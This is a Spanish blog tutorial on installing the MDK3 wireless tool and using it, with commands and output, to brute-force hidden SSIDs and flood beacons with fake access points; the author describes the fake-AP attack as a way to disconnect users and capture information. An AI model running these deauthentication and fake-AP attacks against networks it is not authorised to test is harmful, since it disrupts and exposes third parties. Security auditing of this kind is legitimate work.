viernes, 10 de julio de 2015

Instalar y usar MDK3 en linux

¿Qué es MDK3?

MDK3 es una herramienta para la auditoria de seguridad wireless desarrollada por aspj que, entre otros, explota vulnerabilidades del estándar 802.11, permitiendo además trabajar sobre la nueva pila mac80211. MDK3 usa la librería de inyección osdep del proyecto www.aircrack-ng.org pero es una herramienta absolutamente independiente, pudiendo instalarla sin instalar aircrack-ng.

Características


  • Detecta los SSID oculto por fuerza bruta, aunque lo combina con un diccionario para ganar eficacia.
  • Permite mandar sondas para ver si una red está escuchando.
  • WPA TKIP (hashing de clave WEP WPA) de denegación de servicio.
  • WDS Confusion.
  • FakeAP con inundaciones Beacon con salto de canal.
  • Autenticación-DoS inteligente para bloquear APs.
  • Fuerza bruta de filtros MAC
  • Aka AMOK-MODE para desconectar a todos los clientes y desasociar paquetes.

Instalación

Antes de instalarlo es recomendable tener instalados los paquetes aircrack-ng, curl, hostapd, isc-dhcp-server, lighttpd, macchanger, php5-cgi, pyrit, gcc, g++, y make. Una vez los tengamos instalados realizamos lo siguiente:
Descargamos el paquete desde la páguina oficial (hay otros repositorios alternativos):
root@debian8:~# wget http://aspj.aircrack-ng.org/mdk3-v6.tar.bz2
Descomprimimos el paquete
root@debian8:~# bunzip2 mdk3-v6.tar.bz2
Desempaquetamos el archivo
root@debian8:~# tar -xvf mdk3-v6.tar
Entramos en el directorio mdk3-v6
root@debian8:~# cd mdk3-v6/
Realizamos el make y make install
root@debian8:~/mdk3-v6# make;make install

Podemos comprobar que la instalación ha acabado correctamente porque veremos que no hay ningún error del estilo "make: *** [mdk3] Error 1" y tenemos como linea final "install -D -m 0755 mdk3 //usr/local/sbin/mdk3"


USO

Para usar MDK3 lo primero que tendremos que hacer es poner nuestra tarjeta wifi en modo monitor, para ello usaremos el paquete airmon-ng con la nomenclatura airmon-ng start <INTERFACE WIFI> (hay que lanzarlo con permisos de root y podemos ver las interfaces que tenemos con el comando iwconfig), en mi caso:

root@debian8:~# airmon-ng start wlan0

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
425     NetworkManager
438     avahi-daemon
490     avahi-daemon
792     dhclient
898     wpa_supplicant


Interface       Chipset         Driver

wlan0           Ralink 2573 USB rt73usb - [phy0]SIOCSIFFLAGS: El nombre no es único en la red

                                (monitor mode enabled on mon0)



Como podemos comprobar nos indica que la interfaz wifi que tenemos en modo monitor es la mon0, pero además si hacemos un iwconfig tras lanzar el airmon-ng podremos comprobar que nos aparece una nueva interface, que corresponde a la mon0 con la propiedad Mode:Monitor.


Un ejemplo de uso es el de descubrir las redes con SSID oculto. El siguiente comando se puede lanzar con ataque mediante diccionario o por fuerza bruta pero en mi opinión y dado el poco tiempo que tarda, por fuerza bruta es el método más recomendable además que el ataque por diccionario normalmente no te encuentra ni un 10% de las redes que realmente hay. El uso del comando es mdk3 INTERFACE_WIFI p -c 11 -t BSSID -b a

root@debian8:~# mdk3 mon0  p -c 11 -t F8:8E:85:FF:14:7F -b a

channel set to: 11                                                                                                                                                                                                             SSID Bruteforce Mode activated!                                                                                                                                                                                                


Waiting for beacon frame from target...
Sniffer thread started

Got response from D0:AE:EC:E7:97:B0, SSID: "WLAN_MTA"
Last try was:

Got response from F8:8E:85:FF:14:7F, SSID: "MOVISTAR_147E"
Last try was:

SSID does not seem to be hidden! Found: "MOVISTAR_147E"


Como podemos comprobar para el AP D0:AE:EC:E7:97:B0 el SSID oculto es WLAN_MTA sin embargo también nos indica a título informativo los que no están ocultos, por ejemplo MOVISTAR_147E.


Otro ejemplo de uso es si deseamos generar APs falsos. El fin es desconectar a todos los usuarios de los APs y que cuando se vuelvan a conectar lo realicen en los APs falsos, generando confusión en la red y pudiendo aprovechar el momento para obtener información valiosa (en rio revuelto, ganancia de pescadores). Para realizar esto lanzaremos el comando mdk3 <INTERFAZ_WIFI> b, en mi caso:

root@debian8:~# mdk3 mon0 b
Current MAC: CD:BA:AB:F2:FB:E3 on Channel  2 with SSID: a71i0Rk
Current MAC: 00:D0:01:E6:C4:03 on Channel  5 with SSID: eU6aP,&yxbP#3Mt3>%"EWe;J`]_NU-
Current MAC: 78:AE:CA:98:12:53 on Channel  2 with SSID: c7#w
Current MAC: C4:D8:29:85:75:68 on Channel 12 with SSID: A>R5VJ]\,V9h?rE#r):+"&
Current MAC: 87:02:57:AF:E9:76 on Channel  5 with SSID: O}P-.Q_9[
Current MAC: 0B:27:A0:4E:BB:13 on Channel  5 with SSID: hPK$k
Current MAC: F9:D3:76:FE:14:84 on Channel  4 with SSID: Ler+u|us./1d&
Current MAC: 01:03:75:B1:AB:C9 on Channel 13 with SSID: 7re\$|Ae<'(lY?4:aBp0Vr*R"(Fwu`m
Current MAC: 5E:28:C1:CE:5E:F2 on Channel  6 with SSID: BYpMm^w#j_\<9kp]>#_c^%
Current MAC: 15:C7:9D:0C:76:80 on Channel  9 with SSID: Aop3>^+b($ .hEC"]E
Current MAC: E0:45:FD:52:63:98 on Channel  4 with SSID: jy"}86Wu;hVj_v
Current MAC: BC:A2:82:39:D8:1B on Channel  6 with SSID: zE%dET,JHCLvw=Hj_b5%
Current MAC: 32:F3:EC:15:ED:77 on Channel  6 with SSID: )[x{ uRZnZnk6dJ@ik}vXW4LCy}khF^
Current MAC: A2:AD:14:16:38:87 on Channel 13 with SSID: Kn9L<t9LI]XMaTvvwfOiR8-+jLyK







No hay comentarios:

Publicar un comentario